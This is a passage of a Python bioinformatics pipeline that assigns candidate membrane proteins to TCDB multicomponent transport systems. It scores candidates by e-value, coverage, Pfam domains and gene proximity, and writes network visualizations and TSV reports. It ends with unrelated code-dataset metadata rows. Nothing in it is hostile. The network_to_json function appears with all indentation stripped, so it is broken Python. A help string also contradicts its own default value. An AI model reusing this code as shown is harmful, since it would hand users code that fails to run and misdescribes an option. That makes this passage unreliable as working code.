            print('\n')
    print('The total number of complete systems is: '+str(count_complete_systems(T,nodes)))
    print('The total number of incomplete systems, but possible to be completed later, is: '+str(incom))
    return T
# In[12]:
def network_visualization_v2(G,gene_feature_file,address,condition = 'linear',name='ms_test.html',raw_network=False):
    """Render graph *G* as an interactive HTML page driven by a JSON data file.

    Builds jnodes/jedges dicts (colors, tooltips, layout hints), groups
    candidates that are genetic neighbours (distance <= 15), writes the JSON
    via network_to_json, and instantiates the bundled HTML template with the
    hydropathy-plot address and the JSON URL patched in.

    raw_network -- False when edge/node attributes are nested under 'attr_dic'
                   (recommended network), True when they are flat (raw network).
    Fix vs. original: both template/output file handles are now closed via
    context managers (they were leaked, so the written HTML relied on GC to
    flush).
    """
    nodes = dict(G.nodes(data=True))
    edges = dict(((u,v),e) for u,v,e in G.edges(data=True))
    # NOTE(review): node attributes are read through 'attr_dic' unconditionally
    # here, even when raw_network=True — confirm raw graphs carry 'attr_dic'.
    jnodes = {n:{'tp':nodes[n]['attr_dic']['tp']} for n in nodes}
    systems = [x for x,y in G.nodes(data=True) if y['attr_dic']['tp'] == 'system']
    cands = [x for x,y in G.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
    gene_dic = get_gene_feature(gene_feature_file)
    group = 1
    # assign color / tooltip / fixed-layout attributes per node type
    for jn in jnodes:
        if jnodes[jn]["tp"] == "subject":
            jnodes[jn]["group"] = 0
            jnodes[jn]["color"] = "#1ad8f6"
            jnodes[jn]["fx"] = 0
            jnodes[jn]["fy"] = 0
            jnodes[jn]["fz"] = 0#group * 10 *random.uniform(-1,1)
            jnodes[jn]["note"] = "<span style='font-size:24px; color:red'>Accession: {} <br />#TMS: {} <br /> Matched Components:".format(jn,nodes[jn]['attr_dic']['tms'])
        elif jnodes[jn]["tp"] == "component":
            jnodes[jn]["color"] = "#1af688"
            jnodes[jn]["note"] = "<span style='font-size:24px; color:red'>Accession: {} <br />#TMS: {}".format(jn,nodes[jn]['attr_dic']['tms'])
            jnodes[jn]["fx"] = 0
            jnodes[jn]["fy"] = 0
            jnodes[jn]["fz"] = 0#group * 10 *random.uniform(-1,1)
            jnodes[jn]["group"] = group
            group += 1
        else:
            jnodes[jn]["color"] = "#f6381a"
            jnodes[jn]["note"] = "<span style='font-size:24px; color:red'>#components: {}".format(len(nodes[jn]['attr_dic']['components']))
            jnodes[jn]["fx"] = 0
            jnodes[jn]["fy"] = 0
            jnodes[jn]["fz"] = 0#group * 20 *random.uniform(-1,1)
            jnodes[jn]["group"] = group
            group += 1
    # cluster candidates that sit close together on the genome (distance <= 15)
    all_dist = get_genetic_distance(gene_dic, cands,condition)
    x = all_dist[cands[0]]
    sorted_x = sorted(x.items(), key=operator.itemgetter(1))
    order = dict(sorted_x)
    prevo = ''
    prevd = 0
    for o in order:
        if order[o]>0:
            if order[o] - prevd <= 15:
                # neighbour of the previous candidate: same group, highlighted yellow
                jnodes[o]["color"] = '#f6f31a'
                jnodes[prevo]["color"] = '#f6f31a'
                jnodes[o]["group"] = jnodes[prevo]["group"]
                jnodes[o]["fy"] = jnodes[prevo]["fy"]
            else:
                group += 3
                jnodes[o]["group"] = group
                jnodes[o]["fy"] = random.uniform(-1,1) * group * 5
        else:
            jnodes[o]["group"] = group+3
        prevo = o
        prevd = order[o]
    #print(edges)
    # edge attributes live under 'attr_dic' unless this is the raw network
    if raw_network == False:
        blue_edges = [(u,v) for u,v,e in G.edges(data=True) if e['attr_dic']['tp'] == 'q_vs_s']
        white_edges = [(u,v) for u,v,e in G.edges(data=True) if e['attr_dic']['tp'] == 'hit']
        red_edges = [(u,v) for u,v,e in G.edges(data=True) if e['attr_dic']['tp'] == 'nohit']
        jedges = {(u,v):{"source":u,"target":v,"tp":edges[u,v]['attr_dic']['tp'],"value":5,"color":"#05c1f8","from":'',"to":''} for (u,v) in edges}
    else:
        blue_edges = [(u,v) for u,v,e in G.edges(data=True) if e['tp'] == 'q_vs_s']
        white_edges = [(u,v) for u,v,e in G.edges(data=True) if e['tp'] == 'hit']
        red_edges = [(u,v) for u,v,e in G.edges(data=True) if e['tp'] == 'nohit']
        jedges = {(u,v):{"source":u,"target":v,"tp":edges[u,v]['tp'],"value":5,"color":"#05c1f8","from":'',"to":''} for (u,v) in edges}
    for b in blue_edges:
        jnodes[b[0]]["note"] += "<br /> {}".format(b[1])
        if raw_network == False:
            evalue = edges[(b[0],b[1])]['attr_dic']['evalue']
        else:
            evalue = edges[(b[0],b[1])]['evalue']
        # map -ln(evalue) onto a discrete edge weight 1..4
        if evalue == 0:
            n_e = 1000
        else:
            n_e = -1*math.log(evalue)
        if n_e >= 50:
            wt = 4
        elif n_e >= 25:
            wt = 3
        elif n_e >= 15:
            wt = 2
        else:
            wt = 1
        jedges[(b[0],b[1])]["value"] = wt
        jedges[(b[0],b[1])]["from"] = b[0]
        jedges[(b[0],b[1])]["to"] = b[1]
        if raw_network == False:
            if edges[(b[0],b[1])]['attr_dic']['fusion'] == True:
                jedges[(b[0],b[1])]["color"]="#ef34f8"
        else:
            if edges[(b[0],b[1])]['fusion'] == True:
                jedges[(b[0],b[1])]["color"]="#ef34f8"
    for w in white_edges:
        jedges[(w[0],w[1])]["color"]="#f8f2f1"
    if len(red_edges) > 0: # to visualize in-complete systems
        for r in red_edges:
            jedges[(r[0],r[1])]["color"] = "#f63f1b"
            jnodes[r[0]]["note"] += "<br /> Missing: {}".format(r[1])
    jname = name.split('.')[0]
    network_to_json(jnodes,jedges, jname)
    # Fix: close both handles deterministically (the original leaked them).
    with open(sys.path[0]+'/network_GUI_template.html.bkp','r') as infile:
        lines = infile.readlines()
    # patch the template's hard-coded lines: 20 = asset address, 77 = JSON URL
    lines[19] = " const address = '{}'\n".format('file://'+address)
    lines[76] = " .jsonUrl('{}')\n".format(jname+'.json')
    with open(name,'w') as outfile:
        for line in lines:
            outfile.write(line)
# In[13]:
def network_to_json(jnodes,jedges, subnet_name):
json = open(subnet_name+'.json','w')
json.write('{\n "nodes": [\n ')
i = 0
ln = len(list(jnodes.keys()))
for n in jnodes:
json.write(' {')
json.write('"{}":"{}","{}":"{}","{}":"{}","{}":"{}","{}":{},"{}":"{}"'.format("id",n,"tp",jnodes[n]["tp"],"color",jnodes[n]["color"],"note",jnodes[n]["note"],"fy",jnodes[n]["fy"],"group",jnodes[n]["group"]))
json.write('}')
if i < ln - 1:
json.write(',')
json.write('\n')
i += 1
json.write(' ],\n "links": [\n ')
i = 0
ln = len(list(jedges.keys()))
for e in jedges:
json.write(' {')
json.write('"{}":"{}","{}":"{}","{}":"{}","{}":{},"{}":"{}","{}":"{}","{}":"{}"'.format("source",jedges[e]["source"],"target",jedges[e]["target"],"tp",jedges[e]["tp"],"value",jedges[e]["value"],"color",jedges[e]["color"],"from",jedges[e]["from"],"to",jedges[e]["to"]))
json.write('}')
if i < ln - 1:
json.write(',')
json.write('\n')
i += 1
json.write(' ]\n}')
json.close()
# In[14]:
def global_selection(G,T_com,gene_dic,pfam_dic,df,address,green_name,yellow_name,condition='linear',max_cycle=3): # df is raw table data
    """Run selection() over every system of the recommended network T_com.

    Collects green (first-cycle, confident) and yellow (rescued in later
    cycles) (subject, query) assignments, plus HPI pairs for systems that
    stayed incomplete but look rescuable.  Writes the green/yellow rows of
    *df* to green_name/yellow_name as TSV and returns
    (green_cases, yellow_cases, HPI).
    """
    systems = [x for x,y in T_com.nodes(data=True) if y['attr_dic']['tp'] == 'system']
    nodes = dict(G.nodes(data=True))
    # 'block' accumulates systems already visited by selection(), which
    # appends to it via its visited_sys argument, so linked systems are
    # analyzed once as a group rather than per system
    block = []
    total = 0
    green_cases = [] #list of tuples (subject, query)
    yellow_cases = [] #list of tuples
    HPI = [] # high-possible-incomplete systems, list of tuples (cand,comp) indicating HPI
    for s in systems:
        if s not in block:
            count = 0
            temp = selection(G,T_com,s,gene_dic,pfam_dic,block,count,green_cases,yellow_cases,HPI,address,condition,max_cycle)
            total = total + temp
    print('The total number of potentially complete systems is: '+str(count_complete_systems(T_com,nodes)))
    print('The total number of complete systems is (rescued included): '+str(total))
    # map the selected (subject, query) pairs back to raw-table rows
    green_index = []
    yellow_index = []
    for index,row in df.iterrows():
        if (row['subject_accession'],row['query_accession']) in green_cases:
            green_index.append(index)
        if (row['subject_accession'],row['query_accession']) in yellow_cases:
            yellow_index.append(index)
    df_green = df.loc[green_index]
    df_green.to_csv(green_name, sep='\t')
    if len(yellow_index) > 0:
        df_yellow = df.loc[yellow_index]
        df_yellow.to_csv(yellow_name, sep='\t')
    return green_cases, yellow_cases, HPI
# define the selection function. It will assgin the detailed candidates to a potential complete system
def selection(G,T_com,tcid,gene_dic,pfam_dic,visited_sys,count,green_cases,yellow_cases,HPI,address,condition,max_cycle,cycle=1): # T is a recommended network that only contain all potential complete systems. G is the raw_network, to ensure data extraction easily
    """Assign candidates to one connected group of systems, recursively.

    Cycle 1 gathers every system transitively linked to *tcid* through shared
    candidates into a sub-network S; later cycles re-run on the 'rescue'
    network of systems that stayed complete after removing already-assigned
    candidates.  pedigree() resolves shared candidates; assignments from
    cycle 1 go to green_cases, later cycles to yellow_cases, and incomplete
    systems missing at most half their components are recorded in HPI.
    Returns the running count of complete systems.
    """
    # first, check all candidates in the input system. if a candidate linked to other different systems, bring them in. until all connected systems are analyzed together
    nodes = dict(G.nodes(data=True))
    edges = dict(((u,v),e) for u,v,e in G.edges(data=True))
    HPIA = [] # HPI_alternative
    #T_edges = dict(((u,v),e) for u,v,e in T_com.edges(data=True)) # Important, dont change
    #print(edges)
    # construct a sub network to include all linked systems and analyze them together
    #S = nx.DiGraph()
    rescue = nx.DiGraph()
    if cycle == 1:
        S = nx.DiGraph()
        linked_sys = [tcid]
        # breadth-first expansion: iterating over linked_sys while appending
        # to it pulls in every system reachable via shared candidates
        for ls in linked_sys:
            if ls in T_com:
                for cpt in list(T_com.predecessors(ls)):
                    for cand in list(T_com.predecessors(cpt)):
                        for cp in list(T_com.successors(cand)):
                            p_sys = list(T_com.successors(cp))[0]
                            if p_sys not in linked_sys:
                                linked_sys.append(p_sys)
        for ls in linked_sys:
            visited_sys.append(ls)
            add_system(nodes,edges,T_com,ls,S)
            add_system(nodes,edges,T_com,ls,rescue)
    else:
        S = T_com
        T_com_sys = [x for x,y in T_com.nodes(data=True) if y['attr_dic']['tp'] == 'system']
        for tcs in T_com_sys:
            #add_system(nodes,edges,T_com,tcs,S)
            add_system(nodes,edges,T_com,tcs,rescue)
    print('The total number of potentially complete systems in cycle {} is: '.format(cycle)+str(count_complete_systems(S,nodes)))
    #print(S.nodes(data=True))
    cands = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
    # for the complete subnetwork S, perform pedigree function. pedigree will generate a dic showing the intersection of membrane protein candidates
    # inside the network. if several system share a membrane candidate, or several membrane candidates, they will be analyzed together by paternity_test
    if cycle == 1:
        pedigree(S, linked_sys,gene_dic,pfam_dic,address,condition)
    else:
        pedigree(S, T_com_sys,gene_dic,pfam_dic,address,condition)
    systems = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'system']
    for s in systems:
        situation = check_complete(nodes,S,s)
        if situation[0] == True:
            print('(cycle {})'.format(cycle) + s + ' is complete: ')
            #rescue.remove_node(s)
            for cpt in list(S.predecessors(s)):
                print('component '+cpt+' has candidates: ')
                #rescue.remove_node(cpt)
                for cand in list(S.predecessors(cpt)):
                    if S[cand][cpt]['attr_dic']['fusion'] == True:
                        print(cand + ' ( fusion '+S[cand][cpt]['attr_dic']['fusion_verification']+')')
                    else:
                        print(cand)
                    # an assigned candidate must not be reused by the rescue network
                    if cand in rescue:
                        rescue.remove_node(cand)
                    # add this to the table outputs
                    if cycle == 1:
                        green_cases.append((cand,cpt))
                    else:
                        yellow_cases.append((cand,cpt))
            print('\n')
        else:
            if (cycle == max_cycle or count_complete_systems(rescue,nodes) == 0) and len(situation[1])/len(nodes[s]['components']) <= 0.5:
                print('(cycle {})'.format(cycle) + s + ' is incomplete, but has a high chance to be completed: ')
            else:
                print('(cycle {})'.format(cycle) + s + ' is incomplete: ')
            for cpt in list(S.predecessors(s)):
                print('component '+cpt+' has candidates: ')
                for cand in list(S.predecessors(cpt)):
                    print(cand)
                    # keep (cand,cpt) as a high-possible-incomplete pair
                    if len(situation[1])/len(nodes[s]['components']) <= 0.5:
                        HPIA.append((cand,cpt))
            for ocpt in list(S.successors(s)):
                print('component '+ocpt+' has no candidates!')
            print('\n')
    # prune rescue: drop systems that can no longer be completed
    r_systems = [x for x,y in rescue.nodes(data=True) if y['attr_dic']['tp'] == 'system']
    for rs in r_systems:
        situation = check_complete(nodes,rescue,rs)
        if situation[0] == False:
            rescue.remove_node(rs)
            for rcpt in nodes[rs]['components']:
                if rcpt in rescue: # temporary solution for duplicated component accession in TCDB
                    for rcand in list(rescue.predecessors(rcpt)):
                        rescue.remove_edge(rcand,rcpt)
                    rescue.remove_node(rcpt)
    print('The total number of complete systems in cycle {} is: '.format(cycle)+str(count_complete_systems(S,nodes)))
    print('\n')
    count = count + count_complete_systems(S,nodes)
    if cycle == max_cycle:
        print('Maximum cycle reached, no convergence observed, human intervention required for above cases!!!!!')
        print('\n')
        for pair in HPIA:
            HPI.append(pair)
        return count
    print('\n')
    if count_complete_systems(rescue,nodes) == 0:
        for pair in HPIA:
            HPI.append(pair)
        return count
    else:
        # recurse on the rescue network for the next cycle
        return selection(G,rescue,tcid,gene_dic,pfam_dic,visited_sys,count,green_cases,yellow_cases,HPI,address,condition,max_cycle=max_cycle,cycle=cycle+1)
    #return S,count_complete_systems(S),count_complete_systems(R),systems
#return S,count_complete_systems(S),count_complete_systems(R),systems
def pedigree(S, linked_sys,gene_dic,pfam_dic,address,condition):
    """Resolve candidates shared by several components/systems in S.

    Groups shared candidates by the tuple of systems involved, then by the
    tuple of components involved, and runs paternity_test() on each group —
    most complex (largest candidate list) multi-system groups first.
    Components left with no candidate afterwards get their hit edge flipped
    to a 'nohit' system->component edge.  Mutates S in place.
    """
    #print(linked_sys)
    # generate a dic showing intersection of shared candidates
    nodes = dict(S.nodes(data=True))
    edges = dict(((u,v),e) for u,v,e in S.edges(data=True))
    paternity = {}
    candidates = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
    for cand in candidates:
        cpts_involved = list(S.successors(cand))
        cpts_involved.sort() # to eliminate the effect of insertion order
        if len(cpts_involved) == 1:
            continue # this is the case that candidate is not shared
        # if shared
        sys_involved = []
        for cpt_involved in cpts_involved:
            sys_involved.append(list(S.successors(cpt_involved))[0]) # doesnt matter if system in this list duplicates. It means a candidate hits diffrent components in the same system
        sys_involved = list(set(sys_involved)) # remove duplicates
        # sort and make as a tuple to be the key of paternity dic
        sys_involved.sort()
        key = tuple(sys_involved)
        if key not in paternity:
            paternity[key] = {}
            paternity[key][tuple(cpts_involved)] = [cand]
        else:
            # check if cpts involved are same or not
            if not tuple(cpts_involved) in paternity[key]: # a new set of cpts that from different sys sharing a cand
                paternity[key][tuple(cpts_involved)] = [cand]
            else: # a same set of cpts from same set of sys share another new cand
                paternity[key][tuple(cpts_involved)].append(cand)
    #print(paternity)
    # prepare for paternity_test
    # when performing paternity_test and looping the dictionary: dic_key will be sorted by length of keys, which means linked TCID keys will be examed first
    test_groups = [x for x in list(paternity.keys()) if len(x) > 1]
    # rank each multi-system group by its largest shared-candidate list
    test_groups_complexity = {}
    for tg in test_groups:
        if tg not in test_groups_complexity:
            test_groups_complexity[tg] = 0
        temp = 0
        for pairs in paternity[tg]:
            local = len(paternity[tg][pairs])
            if local > temp:
                temp = local
        test_groups_complexity[tg] = temp
    sorted_tgc = sorted(test_groups_complexity.items(), key=operator.itemgetter(1),reverse=True) # this is the order to keep edges
    tgc = dict(sorted_tgc)
    test_sequence = list(tgc.keys())
    #test_sequence = sorted(test_groups,key=len,reverse=True)
    #print(test_sequence)
    for t in test_sequence: # convert back from tuple to list later
        for rc in paternity[t]: # rc for related cpts
            paternity_test(S,nodes,edges,list(rc), paternity[t][rc],gene_dic,pfam_dic,address,condition) # a dictionary contain all assignments
    #print (complete_sys)
    # components that lost every candidate become explicit 'nohit' edges
    cpts = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'component']
    for cpt in cpts:
        if len(list(S.predecessors(cpt))) == 0: #incomplete sys
            tcid = list(S.successors(cpt))[0]
            S.remove_edge(cpt,tcid)
            S.add_edge(tcid,cpt,attr_dic={'tp':'nohit','title':'Nohit','weight':1})
def paternity_test(S,nodes,edges,children, parents,gene_dic,pfam_dic,address,condition): #children: cpts_involved, parents: candidates_involved
    """Greedily assign candidate proteins (*parents*) to the components
    (*children*) they hit, best test_kit score first.

    A candidate is assigned at most once; a component already covered can
    still accept a second candidate of a system that already got one (dimer
    case).  Edges that lose out are removed from S.  Once every child is
    covered the per-round state resets so another copy of the system can be
    assigned.  Mutates S in place.
    """
    combination = {}
    for p in parents:
        for c in children:
            combination[(p,c)] = test_kit( S,nodes, edges, p, c,gene_dic,pfam_dic,address,condition )
    sorted_combo = sorted(combination.items(), key=operator.itemgetter(1),reverse=True) # this is the order to keep edges
    combo = dict(sorted_combo)
    assigned_cand = []
    assigned_cpts = []
    assigned_sys = []
    for pc_pair in combo: # dimer situation considered
        if pc_pair[0] not in assigned_cand:
            #if pc_pair[1] not in assigned_cpts or :
            assigned_cand.append(pc_pair[0])
            assigned_cpts.append(pc_pair[1])
            assigned_sys=assigned_sys+list(S.successors(pc_pair[1]))
            '''
            else:
                if S.has_edge(pc_pair[0],pc_pair[1]):
                    S.remove_edge(pc_pair[0],pc_pair[1])# remove extra candidate and free them for more potential cases
            '''
        elif pc_pair[1] not in assigned_cpts and list(S.successors(pc_pair[1]))[0] in assigned_sys:
            # check dimer cases
            #if pc_pair[1] not in assigned_cpts and list(S.successors(pc_pair[1]))[0] in assigned_sys:
            assigned_cpts.append(pc_pair[1])
        elif S.has_edge(pc_pair[0],pc_pair[1]):
            S.remove_edge(pc_pair[0],pc_pair[1])
        # every child covered: reset so an extra copy (dimer) can be assigned
        if len(list(set(assigned_cpts))) == len(children):
            assigned_cpts = []
            assigned_sys = []
def test_kit(S, nodes, edges, p, c, gene_dic, pfam_dic, address, condition):
    """Total score for candidate *p* against component *c*: the progressive
    score plus the fusion bonus stored on the p->c edge of S."""
    fusion_bonus = S[p][c]['attr_dic']['fusion_bonus']
    return fusion_bonus + progressive_score(S, nodes, edges, p, c, gene_dic, pfam_dic, address, condition)
# In[15]:
def progressive_score(S, nodes, edges, p, c, gene_dic, pfam_dic, address, condition):
    """Score for assigning candidate *p* to component *c*: the basic alignment
    score plus a genomic-context bonus derived from the genetic distances
    between p and the candidates of c's sibling components."""
    parent_sys = list(S.successors(c))[0]
    siblings = [cpt for cpt in nodes[parent_sys]['attr_dic']['components'] if not cpt == c]
    neighbours = [p]
    for sib in siblings:
        # the successor test depends only on the sibling, so it is hoisted out
        # of the per-candidate loop (same outcome, evaluated once per sibling)
        if len(list(S.successors(sib))) > 0:
            neighbours.extend(S.predecessors(sib))
    if len(set(neighbours)) == 1:
        # special case: during previous processing the system became incomplete
        return 0
    distances_from_p = get_genetic_distance(gene_dic, neighbours, condition)[p]
    p_vs_all = dict(sorted(distances_from_p.items(), key=lambda item: item[1]))
    basic = calculate_individual_basic_score(S, nodes, edges, p, c, pfam_dic, address)
    bonus = calculate_bonus_score(S, nodes, edges, p, c, p_vs_all)
    return basic + bonus
# In[16]:
def calculate_individual_basic_score(S, nodes, edges, p, c, pfam_dic, address): # this is only based on single_edge_confidence
    """Basic alignment score for candidate *p* vs component *c*.

    Combines -log10(evalue) capped at 100 (evalue 0 counts as 100), the better
    of the query/subject coverages, and a +100 bonus when alignment_has_domain
    reports a shared Pfam domain on both sides.
    """
    evalue = edges[(p, c)]['attr_dic']['evalue']
    if evalue == 0:
        normalized_e = 100
    else:
        # cap at 100; the original's else-branch `100 * (normalized_e/100)`
        # was a no-op, so only the cap carries meaning
        normalized_e = min(-1 * math.log(evalue, 10), 100)
    score = normalized_e + max(edges[(p, c)]['attr_dic']['qcov'], edges[(p, c)]['attr_dic']['scov'])
    situations = alignment_has_domain(c, p, pfam_dic, address)
    if situations[0] == True and situations[1] == True:
        score = score + 100
    return score
# In[17]:
def calculate_bonus_score(S, nodes, edges, p, c, p_vs_all, initial_bonus=50, reward=30):
    """Genetic-context bonus for candidate *p* assigned to component *c*.

    p_vs_all maps each relevant protein to its genetic distance from p,
    pre-sorted ascending (p itself appears with distance 0 and is skipped).
    Each near neighbour (distance < 15) earns initial_bonus, and each step of
    a consecutive run (distance gap <= 1 from the previous rewarded neighbour)
    earns an escalating i * reward on top.  Scanning stops at the first gene
    that breaks the neighbourhood.  S/nodes/edges/p/c are unused here but kept
    for a uniform scoring-function signature.
    """
    bonus = 0
    keys = list(p_vs_all.keys())
    # Fix: check the length FIRST. The original evaluated p_vs_all[keys[1]]
    # before its emptiness test, so any dict with fewer than two entries
    # raised IndexError instead of returning 0.
    if len(keys) < 2 or p_vs_all[keys[1]] > 15:
        return bonus
    # check consecutivity of the rest of the genes
    prev = 0
    i = 0
    for pva in p_vs_all:
        if p_vs_all[pva] == 0:
            continue  # skip p itself
        if p_vs_all[pva] < 15:
            bonus += initial_bonus
            if p_vs_all[pva] - prev <= 1:
                i += 1
                bonus += i * reward
                prev = p_vs_all[pva]
            else:
                break
        else:
            break
    return bonus
# In[20]:
def save_network(G, node_filename, edge_filename):
    """Serialize graph *G* into two JSON files: its adjacency/edge structure
    (edge_filename) and its node attribute dicts (node_filename).

    Fix vs. original: the files were opened inline inside json.dump() and
    never closed; context managers now close (and flush) them deterministically.
    """
    saved_nodes = {}
    saved_edges = nx.to_dict_of_dicts(G)
    for s_n in G.nodes(data=True):
        saved_nodes[s_n[0]] = s_n[1]
    with open(edge_filename, 'w') as edge_file:
        json.dump(saved_edges, edge_file)
    with open(node_filename, 'w') as node_file:
        json.dump(saved_nodes, node_file)
# In[21]:
def load_network(node_filename, edge_filename):
    """Rebuild a DiGraph previously written by save_network().

    Edges come from the dict-of-dicts file; node attributes are re-attached
    under 'attr_dic' (unwrapping one level if the saved dict already had an
    'attr_dic' key, so double-wrapping is avoided).

    Fix vs. original: the inline open() handles are now closed via context
    managers instead of being leaked.
    """
    with open(node_filename) as node_file:
        load_nodes = json.load(node_file)
    with open(edge_filename) as edge_file:
        load_edges = json.load(edge_file)
    recover_network = nx.from_dict_of_dicts(load_edges, create_using=nx.DiGraph)
    for ln in load_nodes:
        if 'attr_dic' in load_nodes[ln]:
            recover_network.add_node(ln, attr_dic=load_nodes[ln]['attr_dic'])
        else:
            recover_network.add_node(ln, attr_dic=load_nodes[ln])
    return recover_network
# df = get_rawdata('/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2/reportMulticomponentSystems.tsv')
# pdic = get_info(df['query_accession'], df['subject_accession'],'/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2')
# gene_dic = get_gene_feature('/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/Genomes/GCA_000307105.1_ASM30710v1/GCA_000307105.1_ASM30710v1_feature_table.txt.gz')
# G = initialize_raw_network(df,pdic,'./tcdb.faa','/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2')
# T = raw_recom(G,gene_dic)
# network_visualization_v2(T,'/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/Genomes/GCA_000307105.1_ASM30710v1/GCA_000307105.1_ASM30710v1_feature_table.txt.gz', 'linear','json_test.html',False)
# G1 = load_network('dorothy_RawNodes.txt', 'dorothy_RawEdges.txt')
# T1 = load_network('dorothy_RecNodes.txt', 'dorothy_RecEdges.txt')
# show_subnetwork(T1,G1, ['1.A.30.1.2'],'/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/Genomes/GCA_000307105.1_ASM30710v1/GCA_000307105.1_ASM30710v1_feature_table.txt.gz','/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2/','linear','test_isolated_system.html',False)
# get_genetic_distance(gene_dic,['T'])
# save_network(G, 'dorothy_RawNodes.txt', 'dorothy_RawEdges.txt')
# save_network(T, 'dorothy_RecNodes.txt', 'dorothy_RecEdges.txt')
# green_cases,yellow_cases,HPI = global_selection(G,T,gene_dic,pdic,df,'/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2','dorothy_greens.tsv','dorothy_yellow_greens.tsv')
# In[18]:
def get_df_red(df, green_cases, yellow_cases):
    """Return the rows of *df* not explained by the green/yellow assignments.

    green_cases / yellow_cases are lists of (subject_accession,
    query_accession) tuples.  Any row whose subject was already assigned, or
    whose query (component) already received a candidate, is dropped; the
    remainder is the "red" (unresolved) report.
    """
    # sets instead of lists: O(1) membership test per row instead of O(n)
    hit_cand = set()
    hit_cpts = set()
    for cand, cpt in green_cases:
        hit_cand.add(cand)
        hit_cpts.add(cpt)
    for cand, cpt in yellow_cases:
        hit_cand.add(cand)
        hit_cpts.add(cpt)
    drop_list = []
    for index, row in df.iterrows():
        if row['subject_accession'] in hit_cand or row['query_accession'] in hit_cpts:
            drop_list.append(index)
    df_red = df.drop(index=drop_list)
    #df_red.drop_duplicates('subject_accession',keep='last',inplace=True)
    return df_red
# df_red = get_df_red(df,green_cases,yellow_cases)
# df_red.to_csv('test_dorothy_reds.tsv', sep='\t')
# df_new_red = df.set_index(['subject_accession','query_accession'])
# df_new_red = df_new_red.loc[HPI]
# df_new_red.to_csv('test_dorothy_reds.tsv', sep='\t')
# In[23]:
if __name__ == '__main__':
    # Pipeline driver: parse CLI options, build the raw network, recommend
    # (stage 2), select assignments globally, and write the green / yellow /
    # red TSV reports plus the intermediate network snapshots.
    # parse arguments
    parser = argparse.ArgumentParser()
    # create a parser to handle options and arguments. Show help info if no args
    parser.add_argument( '-d', '--data', type = str, dest = 'data', required=True, metavar = '<raw data table>', help = 'MANDATORY. Path to the output table in tsv format generated by program getMultCompSystems.pl. This table contains all the multicomponent systems matched by the query genome.' )
    parser.add_argument( '-tcdb', '--tcdb-proteins', type = str, dest = 'tcdb', required=True, metavar = '<sequence file>', help = 'MANDATORY. Path to the file in fasta format with All the protein content in TCDB as generated by the program extractFamily.pl. This file should reflect the TCDB version that was used to analyze both single and multicomponet systems in the query genome.' )
    parser.add_argument( '-ra', '--rootaddress', type = str, dest = 'ra', required=True, metavar = '<directory path>', help = 'MANDATORY. Path to the main output directory generated by program getMultCompSystems.pl. This directory contains the output reports as well as all hydropathy plots for every match between the query genome and multicomponent systems in TCDB.' )
    parser.add_argument( '-ft', '--featuretable', type = str, dest = 'ft', required=True, metavar = '<genome featuretable>', help = 'MANDATORY. Path to the feature table file as downloaded from NCBI genome assemblies. This file is used to extract the genomic context of genes and it must be compressed in gzip format.' )
    parser.add_argument( '-clan', '--clan_info_file', type = str, dest = 'clan', required=True, metavar = '<pfam clans file>', help = 'MANDATORY. Path to the file with Pfam clans as distributed by Pfam (i.e., Pfam-A.clans.tsv.gz). The information in this file is used to select the best matches reported by program getMultCompSystems.pl. This file should be compressed in gzip format.' )
    parser.add_argument( '-c', '--circular', action = 'store_false', dest = 'linear', default = True, help = 'Flag. if set, the replicon structure of the query genome is regarded as circular. This information is used to calculate the distance between pairs of genes. The default setting is: linear.' )
    parser.add_argument( '-dot', '--degree_of_tolerance', dest = 'dot', type = int, default = 2, help = 'The degree of tolerance of the network. This indicates ... Default value is 2 (means 2 percent)' )
    # NOTE(review): help text says "Default value is 0.76" but default=0.24 — confirm which is intended
    parser.add_argument( '-rcov','--reciprocal_coverage', dest='pog', type = float, default=0.24, help = 'The minimum alignment coverage for both the query and subject proteins to be considered candidate homologous. Default value is 0.76. ')
    args = parser.parse_args()
    # NOTE(review): argparse already exits on missing required options, so this
    # check is effectively unreachable after a successful parse_args()
    if len(sys.argv) < 4:
        parser.print_help()
        sys.exit(1)
    df,repeats = get_rawdata(args.data)
    pdic = get_info(df['query_accession'], df['subject_accession'], args.ra,args.clan)
    gene_dic = get_gene_feature(args.ft)
    G = initialize_raw_network(df,repeats,pdic,args.tcdb,args.ra,args.pog)
    # save the initial network
    save_network(G, 'raw_network_nodes.txt', 'raw_network_edges.txt')
    if args.linear == True:
        status = 'linear'
    else:
        status = 'non-linear'
    T = raw_recom(G,gene_dic,args.dot,status)
    # save the network of stage 2
    save_network(T, 'recom_network_nodes.txt', 'recom_network_edges.txt')
    green_cases,yellow_cases,HPI = global_selection(G,T,gene_dic,pdic,df,args.ra,'greens.tsv','yellow_greens.tsv',status)
    #analyze_inconfident_data(df,green_cases,yellow_cases,discarded,args.tcdb,args.ra, status,args.pog )
    # rows untouched by green/yellow assignments become the red report
    df_red = get_df_red(df,green_cases,yellow_cases)
    df_red.to_csv('reds.tsv', sep='\t')
    # high-possible-incomplete pairs get their own refined red report
    df_new_red = df.set_index(['subject_accession','query_accession'])
    df_new_red = df_new_red.loc[HPI]
    df_new_red.to_csv('refined_reds.tsv', sep='\t')
# In[ ]:
| 48.632843 | 389 | 0.582432 |
404868d98d0d258657091e11cf84188edb0ff69e | 11,559 | py | Python | python/GafferTest/ComputeNodeTest.py | dboogert/gaffer | d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6 | [
"BSD-3-Clause"
] | null | null | null | python/GafferTest/ComputeNodeTest.py | dboogert/gaffer | d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6 | [
"BSD-3-Clause"
] | null | null | null | python/GafferTest/ComputeNodeTest.py | dboogert/gaffer | d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6 | [
"BSD-3-Clause"
